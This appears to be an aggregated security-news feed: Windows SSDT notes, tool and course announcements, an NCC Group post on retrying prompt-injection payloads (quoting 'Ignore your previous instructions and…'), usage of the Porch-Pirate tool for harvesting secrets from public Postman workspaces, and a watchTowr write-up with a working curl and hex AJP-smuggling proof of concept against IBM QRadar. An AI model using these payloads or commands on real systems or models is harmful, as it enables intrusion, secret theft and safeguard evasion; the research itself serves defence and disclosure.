Note that not all Native APIs have function declarations in user mode or kernel mode header files and if I am not wrong, people may have figured them out via live debug (dynamic analysis) and/or reverse engineering.

System Service Descriptor Table (SSDT)

Windows Kernel handles system calls via SSDT and before invoking a syscall, a SysCall number is placed into EAX register (RAX in case of 64 bit systems). It then checks the KiServiceTable from Kernel’s address space for this SysCall number.

For example, SysCall number for NtOpenProcess() is 0x26. we can check this table by launching WinDBG in local kernel debug mode and using the dd nt!KiServiceTable command.

It displays a list of offsets to actual system calls, such as NtOpenProcess(). We can check the syscall number for NtOpenProcess() by making the dd command display the 0x27th entry from the start of the table (It’s 0x26 but the table index starts at 0).

As you can see, adding L27 to the dd nt!KiServiceTable command displays the offsets for up to 0x26 SysCalls in this table. We can now check if offset 05f2190 resolves to NtOpenProcess(). We can ignore the last bit of this offset, 0. This bit indicates how many stack parameters need to be cleaned up post the SysCall.

The first four parameters are usually pushed to the registers and remaining are pushed to the stack. We have just one bit to represent number of parameters that can go onto the stack, we can represent maximum 0xf parameters.

So in case of NtOpenProcess, there are no parameters on the stack that need to be cleaned up. Now let’s unassembled the instructions at nt!KiServiceTable + 05f2190 to see if this address resolves to SysCall NtOpenProcess().

References / To Do

https://en.wikipedia.org/wiki/Windows_Native_API

https://web.archive.org/web/20110119043027/http://www.codeproject.com/KB/system/Win32.aspx

https://web.archive.org/web/20070403035347/http://support.microsoft.com/kb/187674

https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess

https://learn.microsoft.com/en-us/windows/win32/api/

https://techcommunity.microsoft.com/t5/windows-blog-archive/pushing-the-limits-of-windows-processes-and-threads/ba-p/723824

Windows Device Driver Documentation: https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/_kernel/

Process Info, PEB and TEB etc: https://www.codeproject.com/Articles/19685/Get-Process-Info-with-NtQueryInformationProcess

https://www.microsoftpressstore.com/articles/article.aspx?p=2233328

Offensive Windows Attack Techniques: https://attack.mitre.org/techniques/enterprise/

https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/exploring-process-environment-block

https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Masquerade-PEB.ps1

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

Windows Drivers Reverse Engineering Methodology

Before yesterdayMain stream

Toolkit - The Essential Toolkit For Reversing, Malware Analysis, And Cracking

By: Zion3R
14 April 2024 at 21:24


This tool compilation is carefully crafted with the purpose of being useful both for the beginners and veterans from the malware analysis world. It has also proven useful for people trying their luck at the cracking underworld.

It's the ideal complement to be used with the manuals from the site, and to play with the numbered theories mirror.


Advantages

To be clear, this pack is thought to be the most complete and robust in existence. Some of the pros are:

  1. It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.

  2. The pack is integrated with an Universal Updater made by us from scratch. Thanks to that, we get to mantain all the tools in an automated fashion.

  3. It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use to the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.

  4. The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.

Installation

  1. You can simply download the stable versions from the release section, where you can also find the installer.

  2. Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
    You will find the binary in the folder bin\updater\updater.exe.

Tool set

This toolkit is composed by 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from their original/official websites, but we still recommend you to use them with caution, specially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.

About contributions

Pull Requests are welcome. If you'd want to propose big changes, you should first create an Issue about it, so we all can analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z



The A in CTI Stands for Actionable

13 April 2024 at 18:43
CTI # Cyber Threat Intelligence is about communicating the latest information on threat actors and incidents to organizations in a timely manner. Analysis in these areas allows an organization to maintain situational awareness of the current threat landscape, organizational impacts, and threat actor motives. The level of information that needs to be conveyed is dependent on specific teams within CTI as specific levels on granularity depends on who you’re speaking to.

Public Report – Confidential Mode for Hyperdisk – DEK Protection Analysis

12 April 2024 at 19:00

During the spring of 2024, Google engaged NCC Group to conduct a design review of Confidential Mode for Hyperdisk (CHD) architecture in order to analyze how the Data Encryption Key (DEK) that encrypts data-at-rest is protected. The project was 10 person days and the goal is to validate that the following two properties are enforced:

  • The DEK is not available in an unencrypted form in CHD infrastructure.
  • It is not possible to persist and/or extract an unencrypted DEK from the secure hardware-protected enclaves.

The two secure hardware-backed enclaves where the DEK is allowed to exist in plaintext are:

  • Key Management System HSM – during CHD creation (DEK is generated and exported wrapped) and DEK Installation (DEK is imported and unwrapped)
  • Infrastructure Node AMD SEV-ES Secure Enclave – during CHD access to storage node (DEK is used to process the data read/write operations)

NCC Group evaluated Confidential Mode for Hyperdisk – specifically, the secure handling of Data Encryption Keys across all disk operations including:

  • disk provisioning
  • mounting
  • data read/write operations

The public report for this review may be downloaded below:

Communication Skills in Cybersecurity

By: OffSec
12 April 2024 at 17:09

This blog is based on a conversation we had with Eugene Lim. Eugene is a Senior Cybersecurity Engineer who has earned the OSCP, OSCE3, and OSEE certifications. Follow him on X @spaceraccoonsec and learn about infosec and white hat hacking from his blog.

Β 

The significance of communication skills in cybersecurity often goes unnoticed, eclipsed by the technical acumen required to be a successful cybersecurity practitioner. We discussed the topic of communication skills in cybersecurity with Eugene Lim, a Senior Cybersecurity Engineer who holds the OSCP, OSCE3, and OSEE certifications. He shared a series of insights about how effective communication is not just a supplementary skill but a fundamental necessity.

... Read more Β»

The post Communication Skills in Cybersecurity appeared first on OffSec.

Non-Deterministic Nature of Prompt InjectionΒ 

12 April 2024 at 15:19

As we explained in a previous blogpost, exploiting a prompt injection attack is conceptually easy to understand: There are previous instructions in the prompt, and we include additional instructions within the user input, which is merged together with the legitimate instructions in a way that the underlying model cannot distinguish between them. Just like what happens with SQL Injection. β€œIgnore your previous instructions and…” is the new β€œ AND 1=0 UNION …” in the post-LLM world, right? Well… kind of, but not that much. The big difference between the two is that an SQL database is a deterministic engine, whereas an LLM in general is not (except in certain specific configurations), and this makes a big difference on how we identify and exploit injection vulnerabilities.

When detecting an SQL Injection, we build payloads that include SQL instructions and observe the response to learn more about the injected SQL statement and the database structure. From those responses we can also identify if the injection vulnerability exists, as a vulnerable application would respond differently than expected.

However, detecting a prompt injection vulnerability introduces an additional layer of complexity due to the non-deterministic nature of most LLM setups. Let’s imagine we are trying to identify a prompt injection vulnerability in an application using the following prompt (shown in OpenAI’s Playground for simplicity):

Example of failing prompt injection exploitation.

In this example, β€œSystem” refers to the instructions within the prompt that are invisible and immutable to users; β€œUser” represents the user input, and β€œAssistant” denotes the LLM’s response. Clearly, the user input exploits a prompt injection vulnerability by incorporating additional instructions that supersede the original ones, compelling the application to invariably respond with β€œSecure.” However, this payload fails to work as anticipated because the application responds with β€œInsecure” instead of the expected β€œSecure,” indicating unsuccessful prompt injection exploitation. Viewing this behavior through a traditional SQLi lens, one might conclude the application is effectively shielded against prompt injection. But what happens if we repeat the same user input multiple times?

Example of successful prompt injection exploitation.

In a previous blogpost, we explained that the output of an LLM is essentially the score assigned to each potential token from the vocabulary, determining the next generated token. Subsequently, various parameters, including β€œtemperature” and beam size, are employed to select the next generated token. Some of these parameters involve non-deterministic processes, resulting in the model not always producing the same output for the same input.

Slide of a presentation showing how the next character is chosen under the hood.

This non-deterministic behavior influences how a model responds to inputs that include a prompt injection payload, as illustrated in the example above. Similar behavior might be observed if you have experimented with LLM CTFs, wherein a payload effective for a friend does not appear to work for you. It is likely not a case of your friend cheating; instead, they might just be luckier. Repeating the payload several times might eventually lead to success.

Another factor where the exploitation of prompt injection differs significantly from SQLi exploitation is that of LLM hallucinations. It is not uncommon for a response from an LLM to include a hallucination that may deceive one into believing an injection was successful or had more of an impact than it actually did. Examples include receiving an invented list of previous instructions or expanding on something that the attacker suggested but does not actually exist.

Consequently, identifying prompt injection vulnerabilities should involve repeating the same payloads or minor variations thereof multiple times, followed by verifying the success of any attempt. Therefore, it is crucial to consult with your security vendor about the maximum number of connections they can utilize and how the model is configured to yield deterministic responses. The less deterministic the model and the fewer connections the target service permits, the more time will be needed to achieve comprehensive coverage. If the prompt template and instructions are available, it aids in pinpointing hallucinationsΒ and other similar behaviors, which lead to false positives.

Acknowledgements

Special thanks to Thomas AtkinsonΒ and the rest of the NCC Group team that proofread this blogpost before being published.

Vulnerability Assessment Course – Summer 2024

12 April 2024 at 14:31

This course introduces vulnerability analysis and research with a focus on Ndays. We start with understanding security risks and discuss industry-standard metrics such as CVSS, CWE, and Mitre Attack. Next, we explore the outcome of what a detailed analysis of a CVE contains including vulnerability types, attack vectors, source and binary code analysis, exploitation, and detection and mitigation guidance. In particular, we shall discuss how the efficacy of high-fidelity detection schemes is predicated on gaining a thorough understanding of the vulnerability and exploitation avenues.

Next, we look at the basics of reversing by introducing tools such as debuggers and disassemblers. We look at various bug classes and talk about determining risk just from the title and metadata of a CVE. It will be noted that predicting the severity and exploitability of a vulnerability requires knowledge about the common bug classes and exploitation techniques. To this end, we shall perform deep-dive analyses of a few CVEs that cover different bug classes such as command injection, insecure deserialization, SQL injection, stack- and heap buffer overflows, and other memory corruption vulnerabilities.

Towards the end of the training, the attendee can expect to gain familiarity with several vulnerability types, research tools, and be aware of utility and limitations of detection schemes.

Β 

Emphasis

To prepare the student to fully defend the modern enterprise by being aware and equipped to assess the impact of vulnerabilities across the breadth of the application space.

Β 

Prerequisites

  • Computer with ability to run a virtual machines (recommended 16GB+ memory)
  • Some familiarity with debuggers, Python, C/C++, x86 ASM. IDA Pro or Ghidra experience a plus.

**No prior vulnerability discovery experience is necessary

Β 

Course Information

Attendance will be limited to 25 students per course.

Cost: $4000 USD per attendee

Dates:Β  July 9 – 12, 2024

Location:Β  Washington, D.C.

Β 

Syllabus

Vulnerability and risk assessment

  • Nday risk and patching timelines
  • Vulnerability terminology: CVE, CVSS, CWE, Mitre Attack, Impact, Category
  • Risk assessment
  • Vulnerability mitigation

Binary and code analysis

  • Reverse engineering tools such as debuggers, disassemblers
  • Deep dive into command injection, SQL injection, insecure deserialization with case studies and hands-on practical.
  • Deep dive into buffer overflow and other memory corruption vulnerabilities with case studies and hands-on practical.

Analysis Enrichment

  • Qualitative risk assessment
  • Patch analysis
  • Understanding mitigation techniques
  • Writing detection guidance

The post Vulnerability Assessment Course – Summer 2024 appeared first on Exodus Intelligence.

Public Mobile Exploitation Training – Summer 2024

12 April 2024 at 13:55

This 4 day course is designed to provide students with both an overview of the Android attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, binary instrumentation, and advanced exploitation of widely deployed mobile platforms.

Taught by Senior members of the Exodus Intelligence Mobile Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the Android Kernel, mitigations and execution migration issues with a focus on MediaTek chipsets.

Prerequisites

  • Computer with the ability to run a VirtualBox image (x64,Β recommended 8GB+ memory)
  • Some familiarity with: IDA Pro, Python, C/C++.
  • ARM assembly fluency strongly recommended.
  • Installed and usable copy of IDA Pro 6.1+, VirtualBox, Python.

Course Information

Attendance will be limited to 12 students per course.

Cost: $5000 USD per attendee

Dates:Β  July 15 – 18, 2024

Location:Β  Washington, D.C.

Β 

Β 

Syllabus

Android Kernel

  • Process Management
    • Important structures
    • Memory Management
  • Kernel Synchronization
  • Memory Management
    • Virtual memory
    • Memory allocators
  • Debugging Environment
    • Build the kernel
    • Boot and Root the kernel
    • Kernel debugging
  • Samsung Knox/RKP
  • SELinux
  • Type of kernel vulnerabilities
    • Exploitation primitives
    • Kernel vulnerabilities overview
    • Heap overflows, use-after-free, info leakage
  • Double-free vulnerability (radio)
    • Exploitation – convert the double free into a use-after-free of a struct page
  • Double-free vulnerability (untrusted_app)
    • Vulnerability overview
    • Technique 1: type confusion to obtain write access to globally shared memory
    • Technique 2: UaF that can lead to arbitrary RW in kernel memory

Mediatek / Exynos baseband

  • Introduction
    • Exynos baseband overview
    • Mediatek baseband overview
  • Environment
  • Previous research
  • Analysis of the modem
  • Emulation / Fuzzing
  • Rogue base station
  • Secure boot
  • Mediatek boot rom vulnerability
    • Vulnerability overview
    • Exploitation
    • Using brom exploit to patch the tee
  • Baseband debugger
    • Write the modem physical memory from EL1
  • Β 
  • Β 

The post Public Mobile Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

Public Browser Exploitation Training – Summer 2024

12 April 2024 at 13:54

This 4 day course is designed to provide students with both an overview of the current state of the browser attack surface and an in-depth understanding of advanced vulnerability and exploitation topics. Attendees will be immersed in hands-on exercises that impart valuable skills including static and dynamic reverse engineering, zero-day vulnerability discovery, and advanced exploitation of widely deployed browsers such as Google Chrome.

Taught by Senior members of the Exodus Intelligence Browser Research Team, this course provides students with direct access to our renowned professionals in a setting conducive to individual interactions.

Emphasis

Hands on with privilege escalation techniques within the JavaScript implementations, JIT optimizers and rendering components.

Prerequisites

  • Computer with the ability to run aΒ VirtualBox image (x64,Β recommended 8GB+ memory)
  • Prior experience in vulnerability research, but not necessarily with browsers.

Course Information

Attendance will be limited to 18 students per course.

Cost: $5000 USD per attendee

Dates:Β  July 15 – 18, 2024

Location:Β  Washington, D.C.

Β 

Β 

Syllabus

  • JavaScript Crash Course
  • Browsers Overview
    • Architecture
    • Renderer
    • Sandbox
  • Deep Dive into JavaScript Engines and JIT Compilation
    • Detailed understanding of JavaScript engines and JIT compilation
    • Differences between major JavaScript engines (V8, SpiderMonkey, JavaScriptCore)
  • Introduction to Browser Exploitation
    • Technical aspects and techniques of browser exploitation
    • Focus on JavaScript engine and JIT vulnerabilities
  • Chrome ArrayShift case study
  • JIT Compilers in depth
    • Chrome/V8 Turbofan
    • Firefox/SpiderMonkey Ion
    • Safari/JavaScriptCore DFG/FTL
  • Types of Arrays
  • v8 case study
    • Object in-memory layout
    • Garbage collection
  • Running shellcode
    • Common avenues
    • Mitigations
  • Browser Fuzzing and Bug Hunting
    • Introduction to fuzzing
    • Pros and cons of fuzzing
    • Fuzzing techniques for browsers
    • β€œSmarter” fuzzing
  • Current landscape
  • Hands-on exercises throughout the course
    • Understanding the environment and getting up to speed
    • Analysis and exploitation of a vulnerability

The post Public Browser Exploitation Training – Summer 2024 appeared first on Exodus Intelligence.

Porch-Pirate - The Most Comprehensive Postman Recon / OSINT Client And Framework That Facilitates The Automated Discovery And Exploitation Of API Endpoints And Secrets Committed To Workspaces, Collections, Requests, Users And Teams

By: Zion3R
12 April 2024 at 12:30


Porch Pirate started as a tool to quickly uncover Postman secrets, and has slowly begun to evolve into a multi-purpose reconaissance / OSINT framework for Postman. While existing tools are great proof of concepts, they only attempt to identify very specific keywords as "secrets", and in very limited locations, with no consideration to recon beyond secrets. We realized we required capabilities that were "secret-agnostic", and had enough flexibility to capture false-positives that still provided offensive value.

Porch Pirate enumerates and presents sensitive results (global secrets, unique headers, endpoints, query parameters, authorization, etc), from publicly accessible Postman entities, such as:

  • Workspaces
  • Collections
  • Requests
  • Users
  • Teams

Installation

python3 -m pip install porch-pirate

Using the client

The Porch Pirate client can be used to nearly fully conduct reviews on public Postman entities in a quick and simple fashion. There are intended workflows and particular keywords to be used that can typically maximize results. These methodologies can be located on our blog: Plundering Postman with Porch Pirate.

Porch Pirate supports the following arguments to be performed on collections, workspaces, or users.

  • --globals
  • --collections
  • --requests
  • --urls
  • --dump
  • --raw
  • --curl

Simple Search

porch-pirate -s "coca-cola.com"

Get Workspace Globals

By default, Porch Pirate will display globals from all active and inactive environments if they are defined in the workspace. Provide a -w argument with the workspace ID (found by performing a simple search, or automatic search dump) to extract the workspace's globals, along with other information.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8

Dump Workspace

When an interesting result has been found with a simple search, we can provide the workspace ID to the -w argument with the --dump command to begin extracting information from the workspace and its collections.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --dump

Automatic Search and Globals Extraction

Porch Pirate can be supplied a simple search term, following the --globals argument. Porch Pirate will dump all relevant workspaces tied to the results discovered in the simple search, but only if there are globals defined. This is particularly useful for quickly identifying potentially interesting workspaces to dig into further.

porch-pirate -s "shopify" --globals

Automatic Search Dump

Porch Pirate can be supplied a simple search term, following the --dump argument. Porch Pirate will dump all relevant workspaces and collections tied to the results discovered in the simple search. This is particularly useful for quickly sifting through potentially interesting results.

porch-pirate -s "coca-cola.com" --dump

Extract URLs from Workspace

A particularly useful way to use Porch Pirate is to extract all URLs from a workspace and export them to another tool for fuzzing.

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --urls

Automatic URL Extraction

Porch Pirate will recursively extract all URLs from workspaces and their collections related to a simple search term.

porch-pirate -s "coca-cola.com" --urls

Show Collections in a Workspace

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --collections

Show Workspace Requests

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --requests

Show raw JSON

porch-pirate -w abd6bded-ac31-4dd5-87d6-aa4a399071b8 --raw

Show Entity Information

porch-pirate -w WORKSPACE_ID
porch-pirate -c COLLECTION_ID
porch-pirate -r REQUEST_ID
porch-pirate -u USERNAME/TEAMNAME

Convert Request to Curl

Porch Pirate can build curl requests when provided with a request ID for easier testing.

porch-pirate -r 11055256-b1529390-18d2-4dce-812f-ee4d33bffd38 --curl

Use a proxy

porch-pirate -s coca-cola.com --proxy 127.0.0.1:8080

Using as a library

Searching

p = porchpirate()
print(p.search('coca-cola.com'))

Get Workspace Collections

p = porchpirate()
print(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Dumping a Workspace

p = porchpirate()
collections = json.loads(p.collections('4127fdda-08be-4f34-af0e-a8bdc06efaba'))
for collection in collections['data']:
requests = collection['requests']
for r in requests:
request_data = p.request(r['id'])
print(request_data)

Grabbing a Workspace's Globals

p = porchpirate()
print(p.workspace_globals('4127fdda-08be-4f34-af0e-a8bdc06efaba'))

Other Examples

Other library usage examples can be located in the examples directory, which contains the following examples:

  • dump_workspace.py
  • format_search_results.py
  • format_workspace_collections.py
  • format_workspace_globals.py
  • get_collection.py
  • get_collections.py
  • get_profile.py
  • get_request.py
  • get_statistics.py
  • get_team.py
  • get_user.py
  • get_workspace.py
  • recursive_globals_from_search.py
  • request_to_curl.py
  • search.py
  • search_by_page.py
  • workspace_collections.py


IBM QRadar - When The Attacker Controls Your Security Stack (CVE-2022-26377)

By: Sonny
12 April 2024 at 08:27
IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Welcome to April 2024.

A depressing year so far - we've seen critical vulnerabilities across a wide range of enterprise software stacks.

In addition, we've seen surreptitious and patient threat actors light our industry on fire with slowly introduced backdoors in the XZ library.

Today, in this iteration of 'watchTowr Labs takes aim at yet another piece of software' we wonder why the industry panics about backdoors in libraries that have taken 2 years to be unsuccessfully introduced - while security vendors like IBM can't even update libraries used in their flagship security products that subsequently allow for trivial exploitation.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

Over the last few weeks, we've watched the furor and speculation run rife on Twitter and LinkedIn;

  • Who wrote the XZ backdoor?
  • Which APT group was it?
  • Which country do we blame?
  • Could it happen again?

We sat back and watched the industry discuss how they would solve future iterations of the XZ backdoor - presumably in some sort of parallel universe - because in the one we currently exist in, IBM - a key security vendor - could not even update a dependency in it's flagship security software to keep it secure.

Seriously, what are we doing?

Anyway, we're back at it - sit back, enjoy the mayhem - and join us on this journey into IBM's QRadar.

What is QRadar?

For the uninitiaited on big blue, or those that have just been spared numerous traumatic experiences having to ever configure a SIEM - as mentioned above, QRadar is IBM's crown-jewel, flagship security product.

For those unfamiliar with defensive security products, QRadar is the mastermind application that can sit on-premise or in the cloud via IBM's SaaS offering. Quite simply, it's IBM's Security Information and Event Management (SIEM) product - and is the heart of many enterprise's security software stack.

A (SIEM) solution is a centralised system for monitoring logs ingested from all sorts of endpoints (for example: employee laptops, servers, IoT devices, or cloud environments). These logs are analysed using a defined ruleset to detect potential security incidents.

Has a web shell been deployed to an application server? Has a Powershell process been spawned on the marketing teams' laptops? Is your Domain Controller communicating with Pastebin? SIEMs ingest and analyse alerts, data, and telemetry - and provide feedback alerts to a Blue Team operator to inform them of potential security events.

Should a threat actor manage to compromise a SIEM in an enterprise environment, they'd be able to "look down all the CCTV cameras in the warehouse," so to speak.

With the ability to manipulate records of potential security incidents or to view logs (which all too often contain cleartext credentials) and session data, it is clear how this access permits an attacker to cripple security team capabilities within an organisation.

Obtaining a license for QRadar costs thousands of dollars, but fortunately for us, QRadar is available for download as an installation on-premise in the form ofΒ AWS AMI'sΒ (BYOL) and a freeΒ Community Edition Virtual machine.

Typically, QRadar is deployed within an organisations internal environment - as you'd expect for the management console for a security product - but, a brief internet search reveals that thousands of IBM's customers had "better ideas".

When first reviewing any application for security deficiencies, the first step is to enumerate the routes available. The question posed; where can we, as pre-authenticated users, touch the appliance and interact with its underlying code?

We’re not exaggerating when we state that a deployment of IBM’s QRadar is a behemoth of a solution to analyse- to give some statistics of the available routes amongst the thousands of files, we found a number of paths to explore:

  • 5 .war Files
    • Containing 70+ Servlets
  • 468 JSP files
  • 255 PHP Files
  • 6+ Reverse ProxyPass’s
  • seemingly-infinite defined APIs (as we'd expect for a SIEM)

Each route takes time to meticulously review to e its purpose (and functionality, intentional or otherwise).

Our first encounter with QRadar was back in October of 2023; we spent a number of weeks diving into each route available, extracting the required parameters, and following each of their functions to look for potential security vulnerabilities.

To give some initial context on QRadar, the core application is accessed via HTTPS over port 443, which redirects to the endpoint /console . When reviewing the Apache config that handles this, we can see this is filtered through a ProxyPass rule over the ajp:// protocol to an internal service running on port 8009:

ProxyPass /console/ ajp://localhost:8009/console/

For those new to AJP (Apache JServ Protocol), it is a binary-like protocol for interacting with Java applications instead of a human-readable protocol like HTTP. It is harder for humans to read, but it has similarities, such as parameters and headers.

In the context of QRadar, users typically don’t have direct access to the AJP protocol. Instead, they access it indirectly, sending an HTTP request to /console URI. Anything after this /console endpoint is translated from an HTTP request to an AJP binary packet, which is then actioned by the Java code of the application.

FWIW, it’s considered bad security practice to allow direct access to the AJP protocol, and with good reason - you only have to look at the infamous GhostCat vulnerability that allowed Local File Read and, in some occasions, Remote Code Execution, for an example of what can go wrong when it is exposed to malicious traffic.

Below is an example viewed within WireShark that shows a single HTTP request to a /console endpoint. We can see that this results in a single AJP packet being issued. It’s important to note, for later on, the β€˜one request to one packet’ ratio - every HTTP request results in exactly one set of AJP packets.

IBM QRadar - When The Attacker Controls Your Security Stack   (CVE-2022-26377)

While the majority of servlets and .jsp endpoints reside within the console.war file, these can’t be accessed from a pre-authenticated perspective. As readers will imagine - this is no bueno.

Sadly, in our first encounter - we came up short. The reality of research is that this happens, but as any one that is jaded enough by computers and research will know - we kept meticulous notes, including a Software Bill of Materials (SBOM), in case we needed to come back.

It's a new dawn, it's a new day, it's a new life

Before getting into our current efforts here in 2024, let's discuss something that was brought to light back in 2022 - a then-new class of vulnerability defined as β€œAJP Smuggling”.

A researcher known as β€œRicterZ” released their insight and a PoC into anΒ AJP smuggling vulnerabilityΒ (CVE-2022-26377), which, in short, demonstrates that it is possible to smuggle an AJP packet via an HTTP request containing the header Transfer-Encoding: Chunked, Chunked, and with the request body containing the binary format of the AJP packet. This smuggled AJP request is passed directly to the AJP protocol port should a corresponding Apache ProxyPass rule have been configured.

This was deemed a vulnerability in mod_proxy_ajp, and the assigned CVE is accompanied by the following description:

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.

The impact of this vulnerability was mostly theoretical until a real-world example came to our attention at the start of 2024. This example came in the form of CVE-2023-46747, a compromise of BigIP’s F5 product, achieved using the same AJP smuggling technique.

Here, researchers leveraged the original vulnerability, as documented by RicterZ. This allowed a request to be smuggled to the AJP protocol’s backend, exposing a new attack surface of previously-restricted functionality. This previously-restricted but now-available functionality allowed an unauthenticated attacker to add new a new administrative account to an F5 BigIP device.

Having familiarised ourselves with both the aforementioned F5 BigIP vulnerability and RicterZ’s work, we set out to reboot our QRadar instance to see if our new knowledge was relevant to its implementation of AJP in the console application.

A quick version check of the deployed httpd binary tells us we’re up against Apache 2.4.6, which is a bit newer than the supposedly vulnerable version fo Apache that contained a vulnerable version of mod_proxy_ajp.

As anyone that has ever exploited anything actually knows - version numbers are are at best false-advertising, and thus - frankly - we ignored this. Also, fortunately for us, in the context of the IBM QRadar deployment of Apache, the module proxy_ajp_module is loaded.

[ec2-user@ip-172-31-24-208 tmp]$ httpd -v
Server version: Apache/2.4.6 (Red Hat Enterprise Linux)
Server built:   Apr 21 2020 10:19:09

[ec2-user@ip-172-31-24-208 modules]$ sudo httpd -M | grep proxy_ajp_module
proxy_ajp_module (shared)

To conduct a quick litmus test to whether or not QRadar is vulnerable to CVE-2022-26377, we followed along with RicterZ’s research and tried the PoC, which comes in the form of a curl invocation, intended to retrieve the web.xml file of the ROOT war file to prove exploitability.

The curl PoC can be broken down into two parts:

  • Transfer-Encoding header with the β€œchunked, chunked” value,
  • A raw AJP packet in binary format within the request’s body, stored here in the file pay.txt.
curl -k -i https://<qradar-host>/console/ -H 'Transfer-Encoding: chunked, chunked' \\
		--data-binary @pay.txt
00000000: 0008 4854 5450 2f31 2e31 0000 012f 0000  ..HTTP/1.1.../..
00000010: 0931 3237 2e30 2e30 2e31 00ff ff00 0161  .127.0.0.1.....a
00000020: 0000 5000 0000 0a00 216a 6176 6178 2e73  ..P.....!javax.s
00000030: 6572 766c 6574 2e69 6e63 6c75 6465 2e72  ervlet.include.r
00000040: 6571 7565 7374 5f75 7269 0000 012f 000a  equest_uri.../..
00000050: 0022 6a61 7661 782e 7365 7276 6c65 742e  ."javax.servlet.
00000060: 696e 636c 7564 652e 7365 7276 6c65 745f  include.servlet_
00000070: 7061 7468 0001 532f 2f2f 2f2f 2f2f 2f2f  path..S/////////
00000080: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000090: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000c0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000d0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000e0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000000f0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000100: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000110: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000120: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000130: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000140: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000150: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000160: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000170: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000180: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
00000190: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001a0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001b0: 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f 2f2f  ////////////////
000001c0: 2f2f 2f2f 2f2f 2f2f 2f2f 000a 001f 6a61  //////////....ja
000001d0: 7661 782e 7365 7276 6c65 742e 696e 636c  vax.servlet.incl
000001e0: 7564 652e 7061 7468 5f69 6e66 6f00 0010  ude.path_info...
000001f0: 2f57 4542 2d49 4e46 2f77 6562 2e78 6d6c  /WEB-INF/web.xml
00000200: 00ff

After firing the PoC, we were unable to retrieve the web.xml file as expected. However, we’re quick to notice after firing it a few times in quick succession that there’s a variation between responses, with some returning a 302 status code and some a 403 .

A typical response looks something like this:

HTTP/1.1 302 302
Date: Sun, 10 Mar 2024 01:48:11 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Strict-Transport-Security: max-age=31536000; includeSubDomains
Set-Cookie: JSESSIONID=C7714302E58A4565A3FAA7B786325D93; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-store, max-age=0
Location: /console/core/jsp/Main.jsp;jsessionid=C7714302E58A4565A3FAA7B786325D93
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Expires: Sun, 10 Mar 2024 01:48:11 GMT

And a differential response:

HTTP/1.1 403 403
Date: Sun, 10 Mar 2024 02:12:13 GMT
Server: QRadar
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubdomains;
Content-Length: 0
Cache-Control: max-age=1209600
